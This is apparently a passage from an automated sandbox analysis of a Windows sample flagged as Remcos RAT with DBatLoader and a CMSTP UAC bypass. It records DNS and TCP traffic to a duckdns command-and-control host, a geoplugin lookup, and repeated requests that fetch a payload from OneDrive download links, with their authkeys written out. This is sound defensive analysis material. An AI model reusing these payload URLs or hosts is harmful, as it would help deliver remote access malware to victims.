                                                                                                                                                  Apr 24, 2024 07:22:16.368603945 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:22:33.806273937 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:33.809978008 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:22:34.273492098 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:22:40.475543022 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:23:03.835489988 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:03.876585007 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:03.927098989 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:04.351584911 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:33.868432999 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:23:33.870100021 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:23:34.336030006 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:03.886574030 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:03.890141010 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:24:04.335995913 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:33.914902925 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:24:33.916168928 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:24:34.367285967 CEST114449711103.186.117.142192.168.2.8

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 24, 2024 07:20:30.036339998 CEST6377753192.168.2.81.1.1.1
                                                                                                                                                  Apr 24, 2024 07:20:32.007673025 CEST6317853192.168.2.81.1.1.1
                                                                                                                                                  Apr 24, 2024 07:20:40.180329084 CEST5569953192.168.2.81.1.1.1
                                                                                                                                                  Apr 24, 2024 07:20:40.413579941 CEST53556991.1.1.1192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:41.787137032 CEST6465253192.168.2.81.1.1.1
                                                                                                                                                  Apr 24, 2024 07:20:41.944060087 CEST53646521.1.1.1192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:54.909126043 CEST6274453192.168.2.81.1.1.1

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Apr 24, 2024 07:20:30.036339998 CEST192.168.2.81.1.1.10x81c8Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:32.007673025 CEST192.168.2.81.1.1.10x56bdStandard query (0)oqgp5g.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:40.180329084 CEST192.168.2.81.1.1.10x748fStandard query (0)oceansss.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:41.787137032 CEST192.168.2.81.1.1.10x7113Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:54.909126043 CEST192.168.2.81.1.1.10xc8b6Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Apr 24, 2024 07:20:30.190764904 CEST1.1.1.1192.168.2.80x81c8No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:30.190764904 CEST1.1.1.1192.168.2.80x81c8No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:30.190764904 CEST1.1.1.1192.168.2.80x81c8No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:30.190764904 CEST1.1.1.1192.168.2.80x81c8No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:30.190764904 CEST1.1.1.1192.168.2.80x81c8No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:32.219865084 CEST1.1.1.1192.168.2.80x56bdNo error (0)oqgp5g.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:32.219865084 CEST1.1.1.1192.168.2.80x56bdNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:40.413579941 CEST1.1.1.1192.168.2.80x748fNo error (0)oceansss.duckdns.org103.186.117.142A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:41.944060087 CEST1.1.1.1192.168.2.80x7113No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:55.063916922 CEST1.1.1.1192.168.2.80xc8b6No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:55.063916922 CEST1.1.1.1192.168.2.80xc8b6No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:55.063916922 CEST1.1.1.1192.168.2.80xc8b6No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:55.063916922 CEST1.1.1.1192.168.2.80xc8b6No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 24, 2024 07:20:55.063916922 CEST1.1.1.1192.168.2.80xc8b6No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • onedrive.live.com
                                                                                                                                                  • geoplugin.net

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.849714178.237.33.5080908C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Apr 24, 2024 07:20:42.251774073 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Apr 24, 2024 07:20:42.562464952 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                  date: Wed, 24 Apr 2024 05:20:42 GMT
                                                                                                                                                  server: Apache
                                                                                                                                                  content-length: 965
                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.84970613.107.139.114435592C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-24 05:20:30 UTC213OUTGET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  2024-04-24 05:20:31 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3aCWaxPezvkh22sQYusA24g4qRSfjH6rPA6d_rKcDO9ItkzUtKMazypuFb38jsZrqn0GX_ayYxBqveq8QUWF1JurrQ6nvBAIZ5DDEPoBOBX3lxu5McRcV9OYrjq0-pUI7JlrssrLs3927EUGoGb2Ah_w/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:FaCiQh5k3Ig=:SkD8DkOxxn1UyIdgoBJLut/opsEYmHvMHQSbc3z3T/w=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=493f9b13-5614-4d32-9cc7-4a451fc95e95&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:30 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:31 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 57d8d6c5b8-24zhh
                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: 86F9EA81BD1B4A1EAF42F535C6DC0324 Ref B: BY3EDGE0317 Ref C: 2024-04-24T05:20:30Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:20:31 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.84970913.107.139.11443908C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-24 05:20:36 UTC213OUTGET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  2024-04-24 05:20:37 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7-okDI7Olrq16Bl86hXG7OLLTiDwyvt4fGsk-mimS9Snw5AK8Mtes9Kd7b93nvZTI0-UjhUUJjUprwlrU_sawWX38w11IDy8wt1jKktGPK66TqRMrtC8zkWp69lfqYajj_w42k9XHWu-GxLuEgxcgNQ/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:5pxLRh5k3Ig=:qzsAHQBeECv5Pb4uAHXlFzH/C6exPV/pM810HvunbNg=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=d079e555-187e-4608-98a2-77d21b0733c6&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:37 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:37 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 58656754b6-2st64
                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: EB5578D06186455FA8DE44BA33B2093C Ref B: BY3EDGE0208 Ref C: 2024-04-24T05:20:37Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:20:37 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.84971913.107.139.114434424C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-24 05:20:55 UTC213OUTGET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  2024-04-24 05:20:56 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejblYHxYKxBLzwqLPQ2czzOzs0GNLn99ovlgr_yo0ti0BE0e7e3seMb2l_SL4Mpo8R0C7rtl432UVYzlkwyPqRdW72hV7iQBMhmTQ-1XcazS5RHo-hfaTq89m25QrufiGRyrjj06NDCMRB3UpXIkhYGzgA/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:NJpyUR5k3Ig=:QJraFD9yl//VyTJTsXRCUCOxiLZzixPUDc4LUeQM8b8=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=cdce3314-fc6c-4371-af66-77784ad3f9de&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:40:55 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:20:56 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 57d8d6c5b8-24zhh
                                                                                                                                                  X-ODWebServer: namsouthce375367-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: 14E0F061C4C64A9C8D1815FCDACBA23F Ref B: BY3EDGE0105 Ref C: 2024-04-24T05:20:55Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:20:55 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.84972213.107.139.114436012C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-24 05:21:04 UTC213OUTGET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  2024-04-24 05:21:05 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adwa3g_ERFMT3g_pkY8DxKVxpgvcmTbbSsgspUPsoIt78gOYIDqmsYL11yofEsVqT24H_yKT8DJjuTXBhcSjVy59OeC_x64QCJ1auH-yCJR3-mLHCVsQ-tdwq_kuRkJQiF38BIxb_gvon1e0GbfFF-I2A/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:fXe5Vh5k3Ig=:FS8Eep6VPPt2dJZ6e2KiYyoIYI6PKhXYL+9Ldgdg7Ks=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=b6034e4a-38d6-4597-9a6d-6e6791af3031&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:41:04 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:21:05 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 58656754b6-9ndlp
                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: 4C912B0F20B24B47BE3D4B6AB73B1784 Ref B: BY3EDGE0217 Ref C: 2024-04-24T05:21:04Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:21:04 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.84972513.107.139.114434692C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-24 05:21:21 UTC213OUTGET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  2024-04-24 05:21:22 UTC1177INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Y8mAx3YKIC-W6yq19qfMjzJ-yb8EpydNlskmORiNNEm7URZdVa8SsLGyLiss_iT9mDT9DNyO1XRNVuT0oUWYVanF4hmAqguKLtst5u_uO7qyQrsOsY9SEMT6U9Ki0TuRdXbsktUDPvGCL3ban81vgTQ/255_Cmzcxhwnqpl?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:neP2YB5k3Ig=:HSWruXJqycz2tSB7VRsG9yE0kMr0N2hRjg6NkdcT10o=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=6c2ece84-f7b4-48f3-9c18-7c471a6fdfc7&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:41:21 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 05:21:22 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 58656754b6-zqvx2
                                                                                                                                                  X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: D4576259DED54BABAD60C3EFA9D68174 Ref B: BY3EDGE0509 Ref C: 2024-04-24T05:21:21Z
                                                                                                                                                  Date: Wed, 24 Apr 2024 05:21:22 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:07:20:28
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\fu56fbrtn8.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\fu56fbrtn8.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
